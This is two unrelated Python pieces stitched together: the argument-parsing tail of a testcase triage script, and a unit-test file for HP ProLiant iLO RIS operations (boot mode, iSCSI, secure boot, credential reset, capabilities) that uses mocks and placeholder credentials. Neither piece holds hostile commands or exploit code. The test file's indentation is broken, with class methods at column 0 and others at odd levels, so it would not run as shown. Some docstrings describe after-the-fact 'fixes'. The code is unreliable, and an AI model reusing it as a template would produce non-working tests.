        type=str,
        default='/dev/stdout'
    )
    parser.add_argument(
        'testcase_dir',
        help='path to testcases'
    )
    # First positional token is the binary itself; the rest become its
    # CLI args. NOTE(review): nargs='*' permits an empty list, which
    # would make args.binary[0] below raise IndexError.
    parser.add_argument(
        'binary',
        nargs='*',
        help='binary to triage'
    )
    args = parser.parse_args()
    tool = TriageTool(
        args.testcase_dir,
        binary=args.binary[0],
        binargs=args.binary[1:],
        stdin=args.stdin,
        timeout=args.timeout,
        wait_time=args.wait_time,
        memory=args.memory
    )
    result = tool.run()
    save(args.output, result)
|
# Copyright 2015 Hewlett-Packard Development Company, L.P.
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
"""Test class for RIS Module."""
import json
import ddt
import mock
from requests.packages import urllib3
from requests.packages.urllib3 import exceptions as urllib3_exceptions
import testtools
from proliantutils import exception
from proliantutils.ilo import common
from proliantutils.ilo import constants
from proliantutils.ilo import ris
from proliantutils.tests.ilo import ris_sample_outputs as ris_outputs
from proliantutils import utils
class IloRisTestCaseInitTestCase(testtools.TestCase):
    """Tests for RISOperations construction."""

    @mock.patch.object(urllib3, 'disable_warnings')
    def test_init(self, disable_warning_mock):
        """Constructor stores host, credentials, bios password and cacert."""
        ris_client = ris.RISOperations(
            "x.x.x.x", "admin", "Admin", bios_password='<PASSWORD>',
            cacert='/somepath')
        self.assertEqual(ris_client.host, "x.x.x.x")
        self.assertEqual(ris_client.login, "admin")
        self.assertEqual(ris_client.password, "<PASSWORD>")
        self.assertEqual(ris_client.bios_password, "<PASSWORD>")
        self.assertEqual({}, ris_client.message_registries)
        self.assertEqual(ris_client.cacert, '/somepath')

    @mock.patch.object(urllib3, 'disable_warnings')
    def test_init_without_cacert(self, disable_warning_mock):
        """Without cacert it defaults to None and TLS warnings are disabled."""
        ris_client = ris.RISOperations(
            "x.x.x.x", "admin", "Admin", bios_password='<PASSWORD>')
        self.assertEqual(ris_client.host, "x.x.x.x")
        self.assertEqual(ris_client.login, "admin")
        self.assertEqual(ris_client.password, "<PASSWORD>")
        self.assertIsNone(ris_client.cacert)
        disable_warning_mock.assert_called_once_with(
            urllib3_exceptions.InsecureRequestWarning)
@ddt.ddt
class IloRisTestCase(testtools.TestCase):
def setUp(self):
super(IloRisTestCase, self).setUp()
self.client = ris.RISOperations("1.2.3.4", "Administrator", "Admin")
@mock.patch.object(ris.RISOperations, '_get_bios_setting')
@mock.patch.object(ris.RISOperations, '_is_boot_mode_uefi')
def test_get_http_boot_url_uefi(self, _uefi_boot_mode_mock,
get_bios_settings_mock):
get_bios_settings_mock.return_value = ris_outputs.HTTP_BOOT_URL
_uefi_boot_mode_mock.return_value = True
result = self.client.get_http_boot_url()
_uefi_boot_mode_mock.assert_called_once_with()
self.assertEqual(
'http://10.10.1.30:8081/startup.nsh', result['UefiShellStartupUrl']
)
@mock.patch.object(ris.RISOperations, '_change_bios_setting')
@mock.patch.object(ris.RISOperations, '_is_boot_mode_uefi')
def test_set_http_boot_url_uefi(self, _uefi_boot_mode_mock,
change_bios_setting_mock):
_uefi_boot_mode_mock.return_value = True
self.client.set_http_boot_url('http://10.10.1.30:8081/startup.nsh')
_uefi_boot_mode_mock.assert_called_once_with()
change_bios_setting_mock.assert_called_once_with({
"UefiShellStartupUrl": "http://10.10.1.30:8081/startup.nsh"
})
@mock.patch.object(ris.RISOperations, '_is_boot_mode_uefi')
def test_get_http_boot_url_bios(self, _uefi_boot_mode_mock):
_uefi_boot_mode_mock.return_value = False
self.assertRaises(exception.IloCommandNotSupportedInBiosError,
self.client.get_http_boot_url)
_uefi_boot_mode_mock.assert_called_once_with()
@mock.patch.object(ris.RISOperations, '_is_boot_mode_uefi')
def test_set_http_boot_url_bios(self, _uefi_boot_mode_mock):
_uefi_boot_mode_mock.return_value = False
self.assertRaises(exception.IloCommandNotSupportedInBiosError,
self.client.set_http_boot_url,
'http://10.10.1.30:8081/startup.nsh')
_uefi_boot_mode_mock.assert_called_once_with()
@mock.patch.object(ris.RISOperations, '_rest_patch')
@mock.patch.object(ris.RISOperations, '_check_iscsi_rest_patch_allowed')
@mock.patch.object(ris.RISOperations, '_is_boot_mode_uefi')
def test_set_iscsi_initiator_info_uefi(self, _uefi_boot_mode_mock,
check_iscsi_mock, patch_mock):
_uefi_boot_mode_mock.return_value = True
iscsi_uri = '/rest/v1/systems/1/bios/iScsi/Settings'
check_iscsi_mock.return_value = iscsi_uri
initiator_iqn = 'iqn.2011-07.com.example.server:test1'
initiator_info = {'iSCSIInitiatorName': initiator_iqn}
patch_mock.return_value = (200, ris_outputs.GET_HEADERS,
ris_outputs.REST_POST_RESPONSE)
self.client.set_iscsi_initiator_info(initiator_iqn)
patch_mock.assert_called_once_with(iscsi_uri, None, initiator_info)
@mock.patch.object(ris.RISOperations, '_rest_patch')
@mock.patch.object(ris.RISOperations, '_check_iscsi_rest_patch_allowed')
@mock.patch.object(ris.RISOperations, '_is_boot_mode_uefi')
def test_set_iscsi_initiator_info_failed(self, _uefi_boot_mode_mock,
check_iscsi_mock, patch_mock):
_uefi_boot_mode_mock.return_value = True
iscsi_uri = '/rest/v1/systems/1/bios/iScsi/Settings'
check_iscsi_mock.return_value = iscsi_uri
initiator_iqn = 'iqn.2011-07.com.example.server:test1'
initiator_info = {'iSCSIInitiatorName': initiator_iqn}
patch_mock.return_value = (302, ris_outputs.GET_HEADERS,
ris_outputs.REST_POST_RESPONSE)
self.assertRaises(exception.IloError,
self.client.set_iscsi_initiator_info,
initiator_iqn)
patch_mock.assert_called_once_with(iscsi_uri, None, initiator_info)
@mock.patch.object(ris.RISOperations, '_is_boot_mode_uefi')
def test_set_iscsi_initiator_info_bios(self, _uefi_boot_mode_mock):
_uefi_boot_mode_mock.return_value = False
self.assertRaises(exception.IloCommandNotSupportedError,
self.client.set_iscsi_initiator_info,
'iqn.2011-07.com.example.server:test1')
_uefi_boot_mode_mock.assert_called_once_with()
@mock.patch.object(ris.RISOperations, '_change_iscsi_settings')
@mock.patch.object(ris.RISOperations, '_is_boot_mode_uefi')
def test_set_iscsi_info_uefi(self, _uefi_boot_mode_mock,
change_iscsi_settings_mock):
_uefi_boot_mode_mock.return_value = True
iscsi_variables = {
'iSCSITargetName': 'iqn.2011-07.com.example.server:test1',
'iSCSITargetInfoViaDHCP': False,
'iSCSIBootLUN': '1',
'iSCSIBootEnable': 'Enabled',
'iSCSITargetIpAddress': '10.10.1.30',
'iSCSITargetTcpPort': 3260}
self.client.set_iscsi_info(
'iqn.2011-07.com.example.server:test1',
'1', '10.10.1.30')
_uefi_boot_mode_mock.assert_called_once_with()
change_iscsi_settings_mock.assert_called_once_with(iscsi_variables)
@mock.patch.object(ris.RISOperations, '_change_iscsi_settings')
@mock.patch.object(ris.RISOperations, '_is_boot_mode_uefi')
def test_unset_iscsi_info_uefi(self, _uefi_boot_mode_mock,
change_iscsi_settings_mock):
_uefi_boot_mode_mock.return_value = True
iscsi_variables = {'iSCSIBootEnable': 'Disabled'}
self.client.unset_iscsi_info()
_uefi_boot_mode_mock.assert_called_once_with()
change_iscsi_settings_mock.assert_called_once_with(iscsi_variables)
@mock.patch.object(ris.RISOperations, '_is_boot_mode_uefi')
def test_unset_iscsi_info_bios(self, _uefi_boot_mode_mock):
_uefi_boot_mode_mock.return_value = False
self.assertRaises(exception.IloCommandNotSupportedInBiosError,
self.client.unset_iscsi_info)
_uefi_boot_mode_mock.assert_called_once_with()
@mock.patch.object(ris.RISOperations, '_rest_get')
@mock.patch.object(ris.RISOperations, '_check_bios_resource')
def test_get_iscsi_initiator_info(self, check_bios_mock,
get_mock):
bios_uri = '/rest/v1/systems/1/bios'
settings = json.loads(ris_outputs.GET_BIOS_SETTINGS)
check_bios_mock.return_value = (ris_outputs.GET_HEADERS,
bios_uri, settings)
iscsi_settings = json.loads(ris_outputs.GET_ISCSI_SETTINGS)
get_mock.return_value = (200, ris_outputs.GET_HEADERS,
iscsi_settings)
ret = self.client.get_iscsi_initiator_info()
self.assertEqual(ret, 'iqn.1986-03.com.hp:uefi-p89-mxq45006w5')
@mock.patch.object(ris.RISOperations, '_rest_get')
@mock.patch.object(ris.RISOperations, '_check_bios_resource')
def test_get_iscsi_initiator_info_failed(self, check_bios_mock,
get_mock):
bios_uri = '/rest/v1/systems/1/bios'
settings = json.loads(ris_outputs.GET_BIOS_SETTINGS)
check_bios_mock.return_value = (ris_outputs.GET_HEADERS,
bios_uri, settings)
iscsi_uri = '/rest/v1/systems/1/bios/iScsi'
iscsi_settings = json.loads(ris_outputs.GET_ISCSI_SETTINGS)
get_mock.return_value = (202, ris_outputs.GET_HEADERS,
iscsi_settings)
self.assertRaises(exception.IloError,
self.client.get_iscsi_initiator_info)
check_bios_mock.assert_called_once_with()
get_mock.assert_called_once_with(iscsi_uri)
@mock.patch.object(ris.RISOperations, '_check_bios_resource')
def test_get_iscsi_initiator_info_not_found(self, check_bios_mock):
bios_uri = '/rest/v1/systems/1/bios'
settings = json.loads(ris_outputs.GET_BASE_CONFIG)
check_bios_mock.return_value = (ris_outputs.GET_HEADERS,
bios_uri, settings)
self.assertRaises(exception.IloCommandNotSupportedError,
self.client.get_iscsi_initiator_info)
check_bios_mock.assert_called_once_with()
@mock.patch.object(ris.RISOperations, '_is_boot_mode_uefi')
def test_set_iscsi_info_bios(self, _uefi_boot_mode_mock):
_uefi_boot_mode_mock.return_value = False
self.assertRaises(exception.IloCommandNotSupportedInBiosError,
self.client.set_iscsi_info,
'iqn.2011-07.com.example.server:test1',
'1', '10.10.1.30')
_uefi_boot_mode_mock.assert_called_once_with()
@mock.patch.object(ris.RISOperations, '_rest_get')
@mock.patch.object(ris.RISOperations, '_get_host_details')
def test_get_secure_boot_mode(self, get_details_mock, rest_get_mock):
host_response = ris_outputs.RESPONSE_BODY_FOR_REST_OP
get_details_mock.return_value = json.loads(host_response)
uri = ris_outputs.REST_GET_SECURE_BOOT['links']['self']['href']
rest_get_mock.return_value = (200, ris_outputs.GET_HEADERS,
ris_outputs.REST_GET_SECURE_BOOT)
result = self.client.get_secure_boot_mode()
self.assertFalse(result)
get_details_mock.assert_called_once_with()
rest_get_mock.assert_called_once_with(uri)
@mock.patch.object(ris.RISOperations, '_rest_get')
@mock.patch.object(ris.RISOperations, '_get_host_details')
def test_get_secure_boot_mode_fail(self, get_details_mock, rest_get_mock):
host_response = ris_outputs.RESPONSE_BODY_FOR_REST_OP
get_details_mock.return_value = json.loads(host_response)
uri = ris_outputs.REST_GET_SECURE_BOOT['links']['self']['href']
rest_get_mock.return_value = (301, ris_outputs.GET_HEADERS,
ris_outputs.REST_FAILURE_OUTPUT)
exc = self.assertRaises(exception.IloError,
self.client.get_secure_boot_mode)
get_details_mock.assert_called_once_with()
rest_get_mock.assert_called_once_with(uri)
self.assertIn('FakeFailureMessage', str(exc))
@mock.patch.object(ris.RISOperations, '_get_host_details')
def test_get_secure_boot_mode_not_supported(self, get_details_mock):
host_response = json.loads(ris_outputs.RESPONSE_BODY_FOR_REST_OP)
del host_response['Oem']['Hp']['links']['SecureBoot']
get_details_mock.return_value = host_response
self.assertRaises(exception.IloCommandNotSupportedError,
self.client.get_secure_boot_mode)
get_details_mock.assert_called_once_with()
@mock.patch.object(ris.RISOperations, '_get_host_details')
def test_get_host_power_status_ok(self, get_details_mock):
host_response = ris_outputs.RESPONSE_BODY_FOR_REST_OP
get_details_mock.return_value = json.loads(host_response)
result = self.client.get_host_power_status()
self.assertEqual(result, 'OFF')
get_details_mock.assert_called_once_with()
@mock.patch.object(common, 'wait_for_ilo_after_reset')
@mock.patch.object(ris.RISOperations, '_rest_post')
@mock.patch.object(ris.RISOperations, '_rest_get')
def test_reset_ilo_ok(self, get_mock, post_mock, status_mock):
uri = '/rest/v1/Managers/1'
manager_data = json.loads(ris_outputs.GET_MANAGER_DETAILS)
get_mock.return_value = (200, ris_outputs.GET_HEADERS,
manager_data)
post_mock.return_value = (200, ris_outputs.GET_HEADERS,
ris_outputs.REST_POST_RESPONSE)
self.client.reset_ilo()
get_mock.assert_called_once_with(uri)
post_mock.assert_called_once_with(uri, None, {'Action': 'Reset'})
status_mock.assert_called_once_with(self.client)
@mock.patch.object(ris.RISOperations, '_rest_post')
@mock.patch.object(ris.RISOperations, '_rest_get')
def test_reset_ilo_fail(self, get_mock, post_mock):
uri = '/rest/v1/Managers/1'
manager_data = json.loads(ris_outputs.GET_MANAGER_DETAILS)
get_mock.return_value = (200, ris_outputs.HEADERS_FOR_REST_OP,
manager_data)
post_mock.return_value = (301, ris_outputs.HEADERS_FOR_REST_OP,
ris_outputs.REST_FAILURE_OUTPUT)
exc = self.assertRaises(exception.IloError, self.client.reset_ilo)
get_mock.assert_called_once_with(uri)
post_mock.assert_called_once_with(uri, None, {'Action': 'Reset'})
self.assertIn('FakeFailureMessage', str(exc))
@mock.patch.object(ris.RISOperations, '_get_type')
@mock.patch.object(ris.RISOperations, '_rest_get')
def test_reset_ilo_type_mismatch(self, get_mock, type_mock):
uri = '/rest/v1/Managers/1'
manager_data = json.loads(ris_outputs.GET_MANAGER_DETAILS)
get_mock.return_value = (200, ris_outputs.HEADERS_FOR_REST_OP,
manager_data)
type_mock.return_value = 'Manager.x'
self.assertRaises(exception.IloError, self.client.reset_ilo)
get_mock.assert_called_once_with(uri)
@mock.patch.object(ris.RISOperations, '_is_boot_mode_uefi')
@mock.patch.object(ris.RISOperations, '_change_secure_boot_settings')
def test_reset_secure_boot_keys(self, change_mock,
                                _uefi_boot_mode_mock):
    """In UEFI boot mode, keys are reset via 'ResetToDefaultKeys'."""
    # Pretend the host boots in UEFI mode.
    _uefi_boot_mode_mock.return_value = True

    self.client.reset_secure_boot_keys()

    _uefi_boot_mode_mock.assert_called_once_with()
    change_mock.assert_called_once_with('ResetToDefaultKeys', True)
@mock.patch.object(ris.RISOperations, '_is_boot_mode_uefi')
@mock.patch.object(ris.RISOperations, '_change_secure_boot_settings')
def test_reset_secure_boot_keys_bios(self, change_mock,
                                     _uefi_boot_mode_mock):
    """Resetting keys in legacy BIOS mode is rejected, no settings change."""
    # Legacy BIOS boot mode: the operation is unsupported.
    _uefi_boot_mode_mock.return_value = False

    self.assertRaises(exception.IloCommandNotSupportedInBiosError,
                      self.client.reset_secure_boot_keys)

    _uefi_boot_mode_mock.assert_called_once_with()
    self.assertFalse(change_mock.called)
@mock.patch.object(ris.RISOperations, '_is_boot_mode_uefi')
@mock.patch.object(ris.RISOperations, '_change_secure_boot_settings')
def test_clear_secure_boot_keys(self, change_mock,
                                _uefi_boot_mode_mock):
    """In UEFI boot mode, keys are cleared via 'ResetAllKeys'."""
    _uefi_boot_mode_mock.return_value = True

    self.client.clear_secure_boot_keys()

    _uefi_boot_mode_mock.assert_called_once_with()
    change_mock.assert_called_once_with('ResetAllKeys', True)
@mock.patch.object(ris.RISOperations, '_is_boot_mode_uefi')
@mock.patch.object(ris.RISOperations, '_change_secure_boot_settings')
def test_clear_secure_boot_keys_bios(self, change_mock,
                                     _uefi_boot_mode_mock):
    """Clearing keys in legacy BIOS mode is rejected, no settings change."""
    _uefi_boot_mode_mock.return_value = False

    self.assertRaises(exception.IloCommandNotSupportedInBiosError,
                      self.client.clear_secure_boot_keys)

    _uefi_boot_mode_mock.assert_called_once_with()
    self.assertFalse(change_mock.called)
@mock.patch.object(ris.RISOperations, '_is_boot_mode_uefi')
@mock.patch.object(ris.RISOperations, '_change_secure_boot_settings')
def test_set_secure_boot_mode(self, change_mock,
                              _uefi_boot_mode_mock):
    """In UEFI boot mode the 'SecureBootEnable' setting is toggled."""
    _uefi_boot_mode_mock.return_value = True

    self.client.set_secure_boot_mode(True)

    _uefi_boot_mode_mock.assert_called_once_with()
    change_mock.assert_called_once_with('SecureBootEnable', True)
@mock.patch.object(ris.RISOperations, '_is_boot_mode_uefi')
@mock.patch.object(ris.RISOperations, '_change_secure_boot_settings')
def test_set_secure_boot_mode_bios(self, change_mock,
                                   _uefi_boot_mode_mock):
    """Secure boot cannot be set in legacy BIOS mode; nothing is changed."""
    _uefi_boot_mode_mock.return_value = False

    self.assertRaises(exception.IloCommandNotSupportedInBiosError,
                      self.client.set_secure_boot_mode, True)

    _uefi_boot_mode_mock.assert_called_once_with()
    self.assertFalse(change_mock.called)
@mock.patch.object(ris.RISOperations, '_get_host_details')
def test_get_product_name(self, get_details_mock):
    """get_product_name returns the model string from host details."""
    get_details_mock.return_value = json.loads(
        ris_outputs.RESPONSE_BODY_FOR_REST_OP)

    product = self.client.get_product_name()

    get_details_mock.assert_called_once_with()
    self.assertEqual('ProLiant BL460c Gen9', product)
@mock.patch.object(ris.RISOperations, '_get_bios_setting')
def test_get_current_boot_mode(self, bios_mock):
    """A 'LegacyBios' BIOS setting is reported as 'LEGACY'."""
    bios_mock.return_value = 'LegacyBios'

    self.assertEqual('LEGACY', self.client.get_current_boot_mode())
@mock.patch.object(ris.RISOperations, '_get_bios_settings_resource')
@mock.patch.object(ris.RISOperations, '_check_bios_resource')
def test_get_pending_boot_mode(self, check_mock, bios_mock):
    """The pending boot mode is read from the BIOS settings resource
    and normalized ('UEFI' for the sample payload).
    """
    check_mock.return_value = ('fake', 'fake',
                               json.loads(ris_outputs.GET_BIOS_SETTINGS))
    bios_mock.return_value = ('fake', 'fake',
                              json.loads(ris_outputs.GET_BIOS_SETTINGS))
    result = self.client.get_pending_boot_mode()
    self.assertEqual(result, 'UEFI')
@mock.patch.object(ris.RISOperations, '_change_bios_setting')
def test_set_pending_boot_mode_legacy(self, change_mock):
    """'legacy' maps to the 'LegacyBios' BootMode BIOS value."""
    self.client.set_pending_boot_mode('legacy')

    change_mock.assert_called_once_with({'BootMode': 'LegacyBios'})
@mock.patch.object(ris.RISOperations, '_change_bios_setting')
def test_set_pending_boot_mode_uefi(self, change_mock):
    """'uefi' additionally enables UefiOptimizedBoot."""
    self.client.set_pending_boot_mode('uefi')

    change_mock.assert_called_once_with({'BootMode': 'uefi',
                                         'UefiOptimizedBoot': 'Enabled'})
def test_set_pending_boot_mode_invalid_mode(self):
    """An unknown boot mode string raises IloInvalidInputError."""
    self.assertRaises(exception.IloInvalidInputError,
                      self.client.set_pending_boot_mode, 'invalid')
@ddt.data((0, constants.SUPPORTED_BOOT_MODE_LEGACY_BIOS_ONLY),
          (3, constants.SUPPORTED_BOOT_MODE_UEFI_ONLY),
          (2, constants.SUPPORTED_BOOT_MODE_LEGACY_BIOS_AND_UEFI))
@ddt.unpack
@mock.patch.object(ris.RISOperations, '_get_host_details', autospec=True)
def test_get_supported_boot_mode(
        self, raw_boot_mode_value, expected_boot_mode_value,
        _get_host_details_mock):
    """The raw Oem/Hp/Bios/UefiClass value is mapped to the matching
    SUPPORTED_BOOT_MODE_* constant (data-driven via ddt).
    """
    # | GIVEN |
    system_val = {'Oem': {'Hp': {'Bios':
                  {'UefiClass': raw_boot_mode_value}}}}
    _get_host_details_mock.return_value = system_val
    # | WHEN |
    actual_val = self.client.get_supported_boot_mode()
    # | THEN |
    self.assertEqual(expected_boot_mode_value, actual_val)
@mock.patch.object(ris.RISOperations, '_get_host_details', autospec=True)
def test_get_supported_boot_mode_returns_legacy_bios_if_bios_atrrib_absent(
        self, _get_host_details_mock):
    """Without an Oem/Hp/Bios attribute the supported boot mode
    defaults to legacy-BIOS-only.
    """
    # | GIVEN |
    system_val = {'Oem': {'Hp': {'blahblah': 1234}}}
    _get_host_details_mock.return_value = system_val
    # | WHEN |
    actual_val = self.client.get_supported_boot_mode()
    # | THEN |
    self.assertEqual(constants.SUPPORTED_BOOT_MODE_LEGACY_BIOS_ONLY,
                     actual_val)
@mock.patch.object(ris.RISOperations, '_rest_patch')
@mock.patch.object(ris.RISOperations, '_get_collection')
def test_reset_ilo_credential(self, collection_mock, patch_mock):
    """The matching account's password is PATCHed on a 2xx response.

    Fix: the expected PATCH payload contained a '<PASSWORD>'
    scrubber placeholder; it must match the password actually passed
    to reset_ilo_credential, otherwise the assertion can never hold.
    """
    uri = '/rest/v1/AccountService/Accounts/1'
    collection_output = json.loads(ris_outputs.COLLECTIONS_SAMPLE)
    item = collection_output['Items'][0]
    collection_mock.return_value = [(200, None, item, uri)]
    patch_mock.return_value = (200, ris_outputs.GET_HEADERS,
                               ris_outputs.REST_POST_RESPONSE)
    self.client.reset_ilo_credential('fake-password')
    patch_mock.assert_called_once_with(uri, None,
                                       {'Password': 'fake-password'})
@mock.patch.object(ris.RISOperations, '_rest_patch')
@mock.patch.object(ris.RISOperations, '_get_collection')
def test_reset_ilo_credential_fail(self, collection_mock, patch_mock):
    """A non-2xx PATCH status makes reset_ilo_credential raise IloError.

    Fix: restored the '<PASSWORD>' scrubber placeholder in the expected
    PATCH payload to the 'fake-password' actually passed in.
    """
    uri = '/rest/v1/AccountService/Accounts/1'
    collection_output = json.loads(ris_outputs.COLLECTIONS_SAMPLE)
    item = collection_output['Items'][0]
    collection_mock.return_value = [(200, None, item, uri)]
    patch_mock.return_value = (301, ris_outputs.GET_HEADERS,
                               ris_outputs.REST_POST_RESPONSE)
    self.assertRaises(exception.IloError,
                      self.client.reset_ilo_credential,
                      'fake-password')
    patch_mock.assert_called_once_with(uri, None,
                                       {'Password': 'fake-password'})
@mock.patch.object(ris.RISOperations, '_get_collection')
def test_reset_ilo_credential_no_account(self, collection_mock):
    """IloError is raised when no account matches the client login.

    The client is rebuilt with login 'Admin' so the sample collection
    item does not match it. Fix: the password argument contained a
    '<PASSWORD>' scrubber placeholder; restored to a plain test value.
    """
    uri = '/rest/v1/AccountService/Accounts/1'
    self.client = ris.RISOperations("1.2.3.4", "Admin", "Admin")
    collection_output = json.loads(ris_outputs.COLLECTIONS_SAMPLE)
    item = collection_output['Items'][0]
    collection_mock.return_value = [(200, None, item, uri)]
    self.assertRaises(exception.IloError,
                      self.client.reset_ilo_credential,
                      'fake-password')
@mock.patch.object(ris.RISOperations, '_validate_if_patch_supported')
@mock.patch.object(ris.RISOperations, '_rest_patch')
@mock.patch.object(ris.RISOperations, '_get_bios_hash_password')
@mock.patch.object(ris.RISOperations, '_rest_get')
@mock.patch.object(ris.RISOperations, '_operation_allowed')
@mock.patch.object(ris.RISOperations, '_get_bios_settings_resource')
@mock.patch.object(ris.RISOperations, '_check_bios_resource')
def test_reset_bios_to_default(self, check_mock, bios_mock, op_mock,
                               get_mock, passwd_mock, patch_mock,
                               validate_mock):
    """reset_bios_to_default fetches the BaseConfigs defaults and
    PATCHes them onto the BIOS settings resource.
    """
    settings_uri = '/rest/v1/systems/1/bios/Settings'
    settings = json.loads(ris_outputs.GET_BIOS_SETTINGS)
    base_config = json.loads(ris_outputs.GET_BASE_CONFIG)
    default_config = base_config['BaseConfigs'][0]['default']
    check_mock.return_value = (ris_outputs.GET_HEADERS, 'fake',
                               json.loads(ris_outputs.GET_BIOS_SETTINGS))
    # PATCH is not allowed on the main BIOS resource, so the separate
    # settings resource is resolved and validated (see assertions below).
    op_mock.return_value = False
    passwd_mock.return_value = {}
    get_mock.return_value = (200, 'fake', base_config)
    bios_mock.return_value = (ris_outputs.GET_HEADERS,
                              settings_uri, {})
    patch_mock.return_value = (200, 'fake', 'fake')
    self.client.reset_bios_to_default()
    check_mock.assert_called_once_with()
    bios_mock.assert_called_once_with(settings)
    op_mock.assert_called_once_with(ris_outputs.GET_HEADERS, 'PATCH')
    get_mock.assert_called_once_with('/rest/v1/systems/1/bios/BaseConfigs')
    passwd_mock.assert_called_once_with(None)
    patch_mock.assert_called_once_with(settings_uri, {}, default_config)
    validate_mock.assert_called_once_with(ris_outputs.GET_HEADERS,
                                          settings_uri)
@mock.patch.object(ris.RISOperations, '_is_raid_supported')
@mock.patch.object(ris.RISOperations, '_get_logical_raid_levels')
@mock.patch.object(ris.RISOperations, '_get_drive_type_and_speed')
@mock.patch.object(ris.RISOperations, '_check_iscsi_rest_patch_allowed')
@mock.patch.object(ris.RISOperations, '_get_bios_setting')
@mock.patch.object(ris.RISOperations, '_get_nvdimm_n_status')
@mock.patch.object(ris.RISOperations,
                   '_get_cpu_virtualization')
@mock.patch.object(ris.RISOperations, '_get_tpm_capability')
@mock.patch.object(ris.RISOperations,
                   '_get_number_of_gpu_devices_connected')
@mock.patch.object(ris.RISOperations, 'get_supported_boot_mode')
@mock.patch.object(ris.RISOperations, 'get_secure_boot_mode')
@mock.patch.object(ris.RISOperations, '_get_ilo_firmware_version')
@mock.patch.object(ris.RISOperations, '_get_host_details')
def test_get_server_capabilities(self, get_details_mock, ilo_firm_mock,
                                 secure_mock, boot_mode_mock, gpu_mock,
                                 tpm_mock, cpu_vt_mock, nvdimm_n_mock,
                                 bios_sriov_mock, iscsi_boot_mock,
                                 drive_mock, raid_mock, raid_support_mock):
    """Every capability probe is mocked and the aggregated capability
    dict is compared against the expected map for a UEFI-only,
    TPM-present, RAID-capable server.
    """
    host_details = json.loads(ris_outputs.RESPONSE_BODY_FOR_REST_OP)
    get_details_mock.return_value = host_details
    ilo_firm_mock.return_value = {'ilo_firmware_version': 'iLO 4 v2.20'}
    gpu_mock.return_value = {'pci_gpu_devices': 2}
    boot_mode_mock.return_value = (
        constants.SUPPORTED_BOOT_MODE_UEFI_ONLY)
    cpu_vt_mock.return_value = True
    # NOTE(review): secure_boot 'true' is expected even though the mode
    # mock returns False -- presumably the capability reflects that the
    # probe succeeded, not the mode value; confirm against ris.py.
    secure_mock.return_value = False
    nvdimm_n_mock.return_value = True
    tpm_mock.return_value = True
    bios_sriov_mock.return_value = 'Disabled'
    iscsi_boot_mock.return_value = '/rest/v1/systems/1/bios/iScsi'
    drive_mock.return_value = {'has_rotational': True,
                               'rotational_drive_4800_rpm': True}
    raid_mock.return_value = {'logical_raid_volume_0': 'true'}
    raid_support_mock.return_value = True
    expected_caps = {'secure_boot': 'true',
                     'ilo_firmware_version': 'iLO 4 v2.20',
                     'rom_firmware_version': u'I36 v1.40 (01/28/2015)',
                     'server_model': u'ProLiant BL460c Gen9',
                     'pci_gpu_devices': 2,
                     'trusted_boot': 'true',
                     'cpu_vt': 'true',
                     'nvdimm_n': 'true',
                     'boot_mode_bios': 'false',
                     'boot_mode_uefi': 'true',
                     'iscsi_boot': 'true',
                     'has_rotational': True,
                     'rotational_drive_4800_rpm': True,
                     'logical_raid_volume_0': 'true',
                     'hardware_supports_raid': 'true'}
    capabilities = self.client.get_server_capabilities()
    self.assertEqual(expected_caps, capabilities)
@mock.patch.object(ris.RISOperations, '_is_raid_supported')
@mock.patch.object(ris.RISOperations, '_get_logical_raid_levels')
@mock.patch.object(ris.RISOperations, '_get_drive_type_and_speed')
@mock.patch.object(ris.RISOperations, '_check_iscsi_rest_patch_allowed')
@mock.patch.object(ris.RISOperations, '_get_bios_setting')
@mock.patch.object(ris.RISOperations, '_get_nvdimm_n_status')
@mock.patch.object(ris.RISOperations,
                   '_get_cpu_virtualization')
@mock.patch.object(ris.RISOperations, '_get_tpm_capability')
@mock.patch.object(ris.RISOperations,
                   '_get_number_of_gpu_devices_connected')
@mock.patch.object(ris.RISOperations, 'get_supported_boot_mode')
@mock.patch.object(ris.RISOperations, 'get_secure_boot_mode')
@mock.patch.object(ris.RISOperations, '_get_ilo_firmware_version')
@mock.patch.object(ris.RISOperations, '_get_host_details')
def test_get_server_capabilities_tp_absent(
        self, get_details_mock, ilo_firm_mock, secure_mock, boot_mode_mock,
        gpu_mock, tpm_mock, cpu_vt_mock, nvdimm_n_mock, bios_sriov_mock,
        iscsi_mock, drive_mock, raid_mock, raid_support_mock):
    """With TPM absent, iSCSI unsupported and RAID unsupported, the
    trusted_boot / iscsi_boot / hardware_supports_raid keys must be
    omitted from the capability dict (sriov_enabled appears instead).
    """
    host_details = json.loads(ris_outputs.RESPONSE_BODY_FOR_REST_OP)
    get_details_mock.return_value = host_details
    ilo_firm_mock.return_value = {'ilo_firmware_version': 'iLO 4 v2.20'}
    gpu_mock.return_value = {'pci_gpu_devices': 2}
    boot_mode_mock.return_value = (
        constants.SUPPORTED_BOOT_MODE_LEGACY_BIOS_AND_UEFI)
    secure_mock.return_value = False
    nvdimm_n_mock.return_value = True
    tpm_mock.return_value = False
    cpu_vt_mock.return_value = True
    bios_sriov_mock.return_value = 'Enabled'
    # iSCSI probe failing with IloCommandNotSupportedError must be
    # tolerated and simply drop the 'iscsi_boot' capability.
    iscsi_mock.side_effect = exception.IloCommandNotSupportedError('error')
    drive_mock.return_value = {'has_rotational': True,
                               'rotational_drive_4800_rpm': True}
    raid_mock.return_value = {'logical_raid_volume_0': 'true'}
    raid_support_mock.return_value = False
    expected_caps = {'secure_boot': 'true',
                     'ilo_firmware_version': 'iLO 4 v2.20',
                     'rom_firmware_version': u'I36 v1.40 (01/28/2015)',
                     'server_model': u'ProLiant BL460c Gen9',
                     'pci_gpu_devices': 2,
                     'cpu_vt': 'true',
                     'nvdimm_n': 'true',
                     'sriov_enabled': 'true',
                     'boot_mode_bios': 'true',
                     'boot_mode_uefi': 'true',
                     'has_rotational': True,
                     'rotational_drive_4800_rpm': True,
                     'logical_raid_volume_0': 'true'}
    capabilities = self.client.get_server_capabilities()
    self.assertEqual(expected_caps, capabilities)
@mock.patch.object(ris.RISOperations, '_get_ilo_details')
def test_get_ilo_firmware_version_as_major_minor(
        self, get_ilo_details_mock):
    """The sample manager firmware is reported as major.minor '2.04'."""
    details = json.loads(ris_outputs.GET_MANAGER_DETAILS)
    get_ilo_details_mock.return_value = (details, '/rest/v1/Managers/1')

